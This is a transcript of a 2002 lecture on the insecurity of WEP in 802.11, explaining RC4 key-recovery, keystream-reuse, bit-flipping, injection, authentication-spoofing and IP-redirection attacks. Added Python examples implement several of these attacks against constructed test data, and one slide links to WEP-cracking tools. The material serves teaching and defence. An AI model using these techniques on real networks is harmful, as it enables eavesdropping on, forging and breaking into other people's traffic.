The Insecurity of 802.11 - PowerPoint PPT Presentation

Transcript and Presenter's Notes

1
The Insecurity of 802.11
  • Chun Zhang
  • Mar 6, 2002

2
Outline
  • the 802.11 standard
  • security goals/mechanisms in the 802.11 standard
  • the core failure: Wired Equivalent Privacy
  • reason 1: weakness of RC4
  • reason 2: intercepting
  • non-standard security methods
  • Your 802.11 No Clothes

4
The 802.11 Standard
  • specifies LAN networking over the air (wireless LAN)
  • the standard covers two layers
  • Medium Access Control (MAC)
  • Physical Layer (PHY)

5
Two Kinds of 802.11 Networks
infrastructure network
ad-hoc network
Access Point(AP)
Mobilestation
7
The Parking Lot Attack
  • (figure) an attacker within radio range, e.g. in the parking lot, associates with the access point and lands directly on the internal network, behind the firewall that separates that network from the internet
8
802.11 Security Goals
  • primary goal: confidentiality
  • other goals
  • access control
  • integrity

9
802.11 Security Mechanisms
  • open system security
  • authenticates anyone
  • plaintext transmission
  • shared key security (using WEP)
  • authentication plus encryption/decryption

10
  • Wired Equivalent Privacy
  • stated goal: protecting authorized users of a wireless LAN from casual eavesdropping, i.e. privacy comparable to a wired LAN

11
Properties of WEP protocol (as claimed by the standard)
  • reasonably strong, measured by the cost of a brute-force attack
  • self-synchronizing
  • link-level encryption/decryption protocol
  • efficient
  • exportable
  • implementation optional

12
WEP Protocol (encryption)
  • m: message; c(m): integrity checksum of m (CRC-32)
  • k: shared key
  • iv: 24-bit initialization vector, chosen per packet (the standard leaves the choice to the implementation)
  • C = RC4(iv, k) XOR <m, c(m)>

ciphertext C, with iv in the clear in front of it, transmitted through the radio link
13
WEP Protocol (decryption)
  • m: message; c(m): integrity checksum
  • k: shared key (how it is distributed is not specified)
  • iv: initialization vector, taken from the received frame
  • <m, c'> = C XOR RC4(iv, k); the frame is accepted only if c' = c(m)

ciphertext received through the radio link
14
Authentication using WEP
  • shared-key authentication: the AP sends a cleartext challenge, the station returns it WEP-encrypted under the shared key, and the AP decrypts the response and compares it with the challenge
  • open-system authentication accepts anyone (slide 9)
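
The encryption and decryption steps above and the shared-key authentication round, carried through as an added example for this transcript (it is not code from the presentation or from the standard). The key, IV and challenge bytes are constructed test values; RC4 and CRC-32 are the real algorithms, and, as in WEP, the 3-byte IV is placed in front of the key to form the per-packet RC4 key.

```python
# Added example for this transcript, not code from the presentation.
# WEP encapsulation / decapsulation and shared-key authentication in
# the notation of the slides: C = RC4(iv, k) XOR <m, c(m)>.
import os
import struct
import zlib


def rc4(key: bytes, n: int) -> bytes:
    """First n keystream bytes of RC4 under `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                        # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(m: bytes) -> bytes:
    """c(m): WEP's integrity check value, CRC-32 of m, little-endian."""
    return struct.pack("<I", zlib.crc32(m) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(k: bytes, iv: bytes, m: bytes) -> bytes:
    """Sender: C = RC4(iv || k) XOR <m, c(m)>; the 3-byte iv is prepended in the clear."""
    if len(iv) != 3:
        raise ValueError("WEP iv is 24 bits")
    p = m + icv(m)
    return iv + xor(p, rc4(iv + k, len(p)))


def wep_decrypt(k: bytes, frame: bytes):
    """Receiver: strip iv, XOR with RC4(iv || k), accept m only if c(m) matches."""
    iv, c = frame[:3], frame[3:]
    p = xor(c, rc4(iv + k, len(c)))
    m, tag = p[:-4], p[-4:]
    return m if tag == icv(m) else None


def shared_key_auth(k_station: bytes, k_ap: bytes) -> bool:
    """Shared-key authentication: cleartext challenge from the AP, WEP-encrypted
    echo from the station, AP decrypts and compares.  Keys are passed separately
    only so that a mismatch can be demonstrated; in practice both hold one k."""
    challenge = os.urandom(128)                                   # AP -> station, in the clear
    response = wep_encrypt(k_station, os.urandom(3), challenge)   # station -> AP
    return wep_decrypt(k_ap, response) == challenge               # AP's check


if __name__ == "__main__":
    k = bytes.fromhex("0102030405")                               # constructed 40-bit key
    frame = wep_encrypt(k, b"\x00\x00\x01", b"hello over the air")
    print("iv || C:", frame.hex())
    print("decrypted:", wep_decrypt(k, frame))
    print("auth ok:", shared_key_auth(k, k))
```

Note what the receiver does not check: nothing ties the IV to the key beyond concatenation, and the only integrity check is the unkeyed CRC-32, which is what the attacks on the following slides exploit.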
16
Attacking WEP Keys
  • Weaknesses in the Key Scheduling Algorithm of RC4
  • a paper by Scott Fluhrer, Itsik Mantin, and Adi Shamir
  • SAC 2001
  • Using the Fluhrer, Mantin, and Shamir Attack to Break WEP
  • a paper by Adam Stubblefield, John Ioannidis, and Aviel D. Rubin
  • AT&T Labs Technical Report, 2001

17
Attacking WEP Keys (Cont.)
  • philosophy
  • RC4 has a large class of weak keys (here the key is the WEP key with the IV in front of it) for which knowledge of a small number of key bits suffices to determine many state and output bits with non-negligible probability

18
Attacking WEP Keys (Cont.)
  • mounting the attack
  • passively collect packets and search for IVs that leak information about the WEP key; the IV is sent in the clear, so the first bytes of every per-packet key are known, and the first plaintext byte is known too (every frame starts with the 0xAA of the SNAP header), which gives the first keystream byte
  • each such packet leaks only a little information about the key, so key bytes are recovered by voting over many packets
  • millions of packets to recover a 128-bit key

20
Attacking the holes of WEP
  • Intercepting Mobile Communications: The Insecurity of 802.11
  • a paper by Nikita Borisov, UC Berkeley
  • Ian Goldberg, Zero-Knowledge Systems
  • David Wagner, UC Berkeley
  • appeared in Proceedings of MOBICOM 2001

21
Attack based on Keystream Reuse
  • two ciphertexts produced with the same (iv, k) reveal information about their plaintexts
  • let C1 = P1 XOR RC4(iv, k)
  •     C2 = P2 XOR RC4(iv, k)
  • => C1 XOR C2 = P1 XOR P2
  • knowing P2 gives P1, and vice versa

22
Attack based on Keystream Reuse (Cont.)
  • assuming a fixed k and a known plaintext per iv, one can build a decryption dictionary
  • C = RC4(iv, k) XOR <M, c(M)>
  • P = <M, c(M)>
  • C XOR P = RC4(iv, k), the keystream for that iv
  • number of entries 2^24 (one per iv), each about 1500 bytes, roughly 24 GB in total
  • once built, the table decrypts every packet, however long k is made
  • many access points reset the iv to 0 on power-up and increment it by 1 per packet, so the low iv values are reused early and often
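
The two attacks of these slides, keystream reuse and the decryption dictionary, as an added example for this transcript (not code from the presentation). The attacker-side functions see only ciphertext and known plaintext; keystream() is a constructed stand-in for RC4(iv, k) that models the victim's cipher so the example runs offline, and the attacker never calls it.

```python
# Added example for this transcript, not code from the presentation.
# Keystream reuse (slide 21) and the decryption dictionary (slide 22).
# keystream() is a constructed stand-in for RC4(iv, k) that only the
# victim calls; the attacker functions below see ciphertext and known
# plaintext, never k.
import hashlib
import struct
import zlib


def keystream(iv: bytes, n: int) -> bytes:
    """Stand-in for RC4(iv, k): fixed per iv, like WEP's, never seen by the attacker."""
    return hashlib.shake_256(b"constructed secret k" + iv).digest(n)


def icv(m: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(m) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def victim_encrypt(iv: bytes, m: bytes) -> bytes:
    """C = RC4(iv, k) XOR <M, c(M)>, iv in the clear in front."""
    p = m + icv(m)
    return iv + xor(p, keystream(iv, len(p)))


# ---- attack 1: two frames under the same iv ------------------------------
def recover_from_pair(frame1: bytes, frame2: bytes, known_m2: bytes) -> bytes:
    """C1 XOR C2 = P1 XOR P2, so with P2 = <M2, c(M2)> known, P1 follows.
    Returns the recovered <M1, c(M1)> prefix (as long as the shorter input)."""
    iv1, c1 = frame1[:3], frame1[3:]
    iv2, c2 = frame2[:3], frame2[3:]
    if iv1 != iv2:
        raise ValueError("different ivs: no keystream reuse to exploit")
    p2 = known_m2 + icv(known_m2)
    n = min(len(c1), len(c2), len(p2))
    return xor(xor(c1[:n], c2[:n]), p2[:n])


# ---- attack 2: decryption dictionary --------------------------------------
def dictionary_entry(frame: bytes, known_m: bytes):
    """One table row: iv -> RC4(iv, k) = C XOR <M, c(M)>."""
    iv, c = frame[:3], frame[3:]
    p = known_m + icv(known_m)
    return iv, xor(c, p[:len(c)])


def dictionary_decrypt(table: dict, frame: bytes):
    """Decrypt any later frame whose iv is in the table; None if unknown iv or bad ICV."""
    iv, c = frame[:3], frame[3:]
    ks = table.get(iv)
    if ks is None or len(ks) < len(c):
        return None
    p = xor(c, ks[:len(c)])
    m, tag = p[:-4], p[-4:]
    return m if tag == icv(m) else None


def dictionary_size_bytes(entry_len: int = 1500) -> int:
    """2^24 ivs times one maximum-size keystream each: the slide's 'roughly 24 GB'."""
    return (1 << 24) * entry_len


if __name__ == "__main__":
    iv = b"\x00\x00\x07"                       # low iv: reused soon after a reset
    f1 = victim_encrypt(iv, b"GET /secret HTTP")
    f2 = victim_encrypt(iv, b"GET /index HTTP/")
    print("P1 from P2:", recover_from_pair(f1, f2, b"GET /index HTTP/")[:16])
    table = dict([dictionary_entry(f2, b"GET /index HTTP/")])
    print("table hit:", dictionary_decrypt(table, f1))
    print("table size: %.1f GB" % (dictionary_size_bytes() / 1e9))
```

The last bullet of the slide is what makes the table practical: a card that restarts its counter at 0 hands the attacker the same low IVs over and over, so the table fills from the bottom and pays off long before all 2^24 rows are present.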

23
Attacks based on the Properties of Checksum
  • property 1 (of the WEP CRC-32 checksum): it is linear, c(x XOR y) = c(x) XOR c(y)
  • message modification
  • C = RC4(iv, k) XOR <M, c(M)>
  • to change P = <M, c(M)> into P XOR Δ, send C' = C XOR <Δ, c(Δ)>: the receiver's checksum still verifies and the attacker never needs the key
  • in practice: with CRC-32's initial value and final complement the identity is c(x XOR y) = c(x) XOR c(y) XOR c(0), 0 being a zero string of the same length, so the correction term to XOR into the encrypted checksum is c(Δ) XOR c(0)

24
Attacks based on the Properties of Checksum
(Cont.)
  • property 2 (of the WEP CRC-32 checksum): it is an un-keyed function of the message, so anyone can compute c(M) for a chosen M
  • property 3 (of WEP access points): an old IV value can be reused without triggering any alarm at the receiver

25
Attacks based on the Properties of Checksum
(Cont.)
  • message injection
  • choose any M and compute c(M) (property 2)
  • C = RC4(iv, k) XOR <M, c(M)>, using keystream recovered for that iv from a known plaintext
  • send it under that iv (property 3)
  • a special case: authentication spoofing, since one observed challenge and its encrypted response give the keystream needed to answer later challenges
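
Message modification (slide 23) and message injection with authentication spoofing (slide 25), as one added example for this transcript (not code from the presentation). As in the keystream-reuse example, keystream() is a constructed stand-in for RC4(iv, k) that only the victim side calls; the attacker functions work on ciphertext, a known plaintext and the CRC alone. The example also carries the CRC-32 caveat from slide 23: the correction XORed into the encrypted ICV is c(Δ) XOR c(0), not c(Δ) by itself.

```python
# Added example for this transcript, not code from the presentation.
# Message modification (slide 23) and message injection / authentication
# spoofing (slide 25).  keystream() is a constructed stand-in for RC4(iv, k);
# only the victim calls it.
import hashlib
import struct
import zlib


def keystream(iv: bytes, n: int) -> bytes:
    return hashlib.shake_256(b"constructed secret k" + iv).digest(n)


def icv(m: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(m) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def victim_encrypt(iv: bytes, m: bytes) -> bytes:
    p = m + icv(m)
    return iv + xor(p, keystream(iv, len(p)))


def victim_receive(frame: bytes):
    """Receiver: any iv is accepted (property 3), only the ICV is checked."""
    iv, c = frame[:3], frame[3:]
    p = xor(c, keystream(iv, len(c)))
    m, tag = p[:-4], p[-4:]
    return m if tag == icv(m) else None


# ---- message modification (attacker side, no key) -------------------------
def icv_correction(delta: bytes) -> bytes:
    """c(M XOR delta) = c(M) XOR c(delta) XOR c(0...0) for standard CRC-32 (the
    initial value and final complement make it affine rather than strictly
    linear), so this is the term to XOR into the encrypted ICV."""
    return xor(icv(delta), icv(bytes(len(delta))))


def modify(frame: bytes, delta: bytes) -> bytes:
    """C' = C XOR <delta, correction>: turns M into M XOR delta under the same iv."""
    iv, c = frame[:3], frame[3:]
    n = len(c) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole message")
    return iv + xor(c[:n], delta) + xor(c[n:], icv_correction(delta))


def change_bytes(length: int, offset: int, old: bytes, new: bytes) -> bytes:
    """delta that rewrites old -> new at offset, zero elsewhere (old must be known)."""
    d = bytearray(length)
    d[offset:offset + len(old)] = xor(old, new)
    return bytes(d)


# ---- message injection and authentication spoofing (attacker side) --------
def recover_keystream(frame: bytes, known_m: bytes):
    """Known plaintext gives the keystream for this iv: C XOR <M, c(M)>."""
    iv, c = frame[:3], frame[3:]
    return iv, xor(c, known_m + icv(known_m))


def inject(iv: bytes, ks: bytes, m: bytes) -> bytes:
    """Forge a fresh, valid frame under an iv whose keystream is known."""
    p = m + icv(m)
    if len(p) > len(ks):
        raise ValueError("not enough keystream for this message")
    return iv + xor(p, ks[:len(p)])


def spoof_auth(seen_challenge: bytes, seen_response: bytes, new_challenge: bytes) -> bytes:
    """One observed challenge/response pair yields 132 keystream bytes, enough to
    answer any later 128-byte challenge without knowing the key."""
    iv, ks = recover_keystream(seen_response, seen_challenge)
    return inject(iv, ks, new_challenge)


if __name__ == "__main__":
    iv = b"\x01\x02\x03"
    m = b"to: alice@example.test  amount: 0100"        # constructed plaintext
    frame = victim_encrypt(iv, m)
    tampered = modify(frame, change_bytes(len(m), 32, b"0100", b"9900"))
    print("receiver saw:", victim_receive(tampered))
    iv2, ks = recover_keystream(frame, m)
    print("injected:", victim_receive(inject(iv2, ks, b"pay mallory 9900")))
```

Flipping the same bytes without the ICV correction is rejected, which is the only thing the receiver can notice; a keyed checksum (slide 34) is what would stop the corrected version too.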

26
Message Decryption
  • IP redirection
  • the access point acts as an IP router with Internet connectivity
  • change the destination address of an encrypted packet to a host the attacker controls
  • the access point decrypts the packet and forwards it to us
  • reaction attack
  • used when no attacker-controlled host is reachable
  • modify the ciphertext based on some knowledge of its structure
  • information leaks through the receiver's reaction

27
IP Redirection
  • changing the IP destination address
  • assumes the original source/destination addresses are easy to guess
  • message modification as on slide 23
  • the IP header checksum must change as well
  • old checksum X
  • new checksum X' = X + DH + DL - D'H - D'L (+, - in one's complement arithmetic)
  • DH, DL: high/low 16-bit words of the old destination address; D'H, D'L: those of the new one
  • X itself is encrypted, and the change must be applied by XOR, whose mask differs from the arithmetic change only by carries; the right mask is found after a small number of attempts

28
IP Redirection (Continued)
  • changing another field so that the IP checksum stays the same
  • modify the source IP address: subtract D'H + D'L - DH - DL from its low 16-bit word
  • such packets might be dropped by egress filtering
  • choose the destination address instead, if the attacker can monitor an entire class B network: pick D'H and set D'L = DH + DL - D'H
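
The checksum arithmetic of these two slides, as an added example for this transcript (not code from the presentation). It runs on a constructed 20-byte IPv4 header with test-range addresses (10.0.0.5, 192.0.2.10, 198.51.100.7) and checks each of the three variants, patching X, choosing a neutral destination, and compensating in the source address, against the router's own verification.

```python
# Added example for this transcript, not code from the presentation.
# The one's-complement arithmetic behind IP redirection (slides 27 and 28),
# run on a constructed 20-byte IPv4 header with test-range addresses.
import socket
import struct


def ones_add(a: int, b: int) -> int:
    """16-bit one's-complement addition (end-around carry)."""
    s = a + b
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return s


def ones_sub(a: int, b: int) -> int:
    """a - b in one's complement: add the bitwise complement of b."""
    return ones_add(a, (~b) & 0xFFFF)


def words(b: bytes) -> list:
    return [(b[i] << 8) | b[i + 1] for i in range(0, len(b), 2)]


def ip_checksum(header: bytes) -> int:
    """RFC 791 header checksum: complement of the one's-complement sum of all
    16-bit words, with the checksum field itself taken as zero."""
    s = 0
    for w in words(header[:10] + b"\x00\x00" + header[12:]):
        s = ones_add(s, w)
    return (~s) & 0xFFFF


def verify(header: bytes) -> bool:
    """What the router checks: summing every word, checksum included, gives all ones."""
    s = 0
    for w in words(header):
        s = ones_add(s, w)
    return s == 0xFFFF


def ipv4_header(src: str, dst: str, total_len: int = 40) -> bytes:
    h = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                    socket.inet_aton(src), socket.inet_aton(dst))
    return h[:10] + struct.pack("!H", ip_checksum(h)) + h[12:]


def patch_destination(header: bytes, new_dst: str) -> bytes:
    """Slide 27: X' = X + DH + DL - D'H - D'L, without recomputing over the header.
    (Against WEP the attacker applies X XOR X' to the ciphertext, so X must be
    known or guessed; here the arithmetic itself is what is checked.)"""
    X = words(header[10:12])[0]
    DH, DL = words(header[16:20])
    nd = socket.inet_aton(new_dst)
    nDH, nDL = words(nd)
    Xn = ones_sub(ones_sub(ones_add(ones_add(X, DH), DL), nDH), nDL)
    return header[:10] + struct.pack("!H", Xn) + header[12:16] + nd


def neutral_destination(header: bytes, new_hi: int) -> bytes:
    """Slide 28: pick the new low word D'L = DH + DL - D'H so the checksum is
    untouched; only useful if the attacker can sniff that whole class B."""
    DH, DL = words(header[16:20])
    return struct.pack("!HH", new_hi, ones_sub(ones_add(DH, DL), new_hi))


def compensate_source(header: bytes, new_dst: str) -> bytes:
    """Slide 28: keep X by subtracting D'H + D'L - DH - DL from the source's low word."""
    DH, DL = words(header[16:20])
    nd = socket.inet_aton(new_dst)
    nDH, nDL = words(nd)
    SH, SL = words(header[12:16])
    delta = ones_sub(ones_sub(ones_add(nDH, nDL), DH), DL)
    return header[:12] + struct.pack("!HH", SH, ones_sub(SL, delta)) + nd


if __name__ == "__main__":
    h = ipv4_header("10.0.0.5", "192.0.2.10")
    h2 = patch_destination(h, "198.51.100.7")
    print("redirected, checksum ok:", verify(h2), hex(words(h2[10:12])[0]))
    h3 = h[:16] + neutral_destination(h, 0xC633)          # 198.51.x.y
    print("neutral dst:", socket.inet_ntoa(h3[16:20]), verify(h3))
```

The neutral-destination variant never touches X, which is why it sidesteps the carry problem of slide 27 entirely; its price is that the low 16 bits of the destination are dictated by the arithmetic, hence the need to watch a whole class B.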

29
Reaction Attacks
  • attack against TCP traffic
  • fact: a TCP ACK is sent only if the TCP checksum is correct
  • flipping bit i and bit i+16 leaves the TCP checksum unchanged if and only if bit i XOR bit (i+16) = 1
  • so the receiver's reaction (ACK or no ACK) leaks one bit of plaintext per trial; repeating the procedure on the same message for all i reveals the plaintext of that message

31
Closed Network Access Control
  • SSID: service set identifier
  • only stations that know the SSID are served
  • unfortunately, the SSID is broadcast in the clear

32
Access Control List
  • Ethernet MAC address access control lists
  • only wireless cards with a listed MAC address are served
  • unfortunately, MAC addresses are also sent in the clear over the air
  • a wireless card's MAC address can be cloned

33
Hacking Tools
  • to crack the key
  • http://airsnort.sourceforge.net/
  • http://sourceforge.net/projects/wepcrack/
  • wireless sniffers
  • http://www.personaltelco.net/index.cgi/WirelessSniffers

34
Countermeasures
  • treat the wireless LAN as if it did not exist, i.e. as untrusted
  • put the access point outside the firewall
  • higher-level protection: Virtual Private Network, SSL, SSH, IPSec
  • existing protocols and primitives: Kerberos, AES
  • improvements to WEP
  • key management
  • longer iv and k (WEP2)
  • keyed checksum

35
Thanks !